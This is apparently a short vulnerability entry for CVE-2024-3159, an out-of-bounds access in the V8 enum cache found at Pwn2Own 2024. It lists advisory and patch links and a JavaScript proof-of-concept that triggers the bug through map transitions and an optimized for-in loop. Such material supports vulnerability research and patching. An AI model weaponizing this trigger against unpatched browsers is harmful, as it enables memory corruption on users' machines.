Info

Out of bounds memory access in V8. Reported by Edouard Bochin (@le_douds) and Tao Yan (@ga1ois) of Palo Alto Networks, via Pwn2Own 2024 on 2024-03-22
“earning $42,500 and 9 Master of Pwn points” https://twitter.com/thezdi/status/1770927914831274115
https://chromereleases.googleblog.com/2024/04/stable-channel-update-for-desktop.html
https://issues.chromium.org/issues/330760873
https://chromium-review.googlesource.com/c/v8/v8/+/5388435

Related to CVE-2023-4427 enum cache indices array out of bound access

PoC

const object1 = {};
object1.a = 1;

const object2 = {};
object2.a = 1;
object2.b = 1;

const object3 = {};
object3.a = 1;
object3.b = 1;
object3.c = 1;
Object.defineProperty(object3, "d", {writable: false, enumerable: true, value: 1});

// create a split branch in map transition tree
const object4 = {};
object4.a = 1;
object4.b = 1;
object4.c = 1;
object4.d = 1;

for (let key in object3) { }

delete object3.d;

let escape;
function trigger(callback) {
  for (let key in object2) {
  	callback();
  	escape = object2[key];
  }
}

%PrepareFunctionForOptimization(trigger);
trigger(_ => _);
trigger(_ => _);
%OptimizeFunctionOnNextCall(trigger);

trigger(_ => {
	object4.c = 1.1;
	for (let key in object1) { }
});

// %SystemBreak();

CVE-2024-3159 PoC: v8 enumcache oob 2.0, Pwn2Own 2024

Info

PoC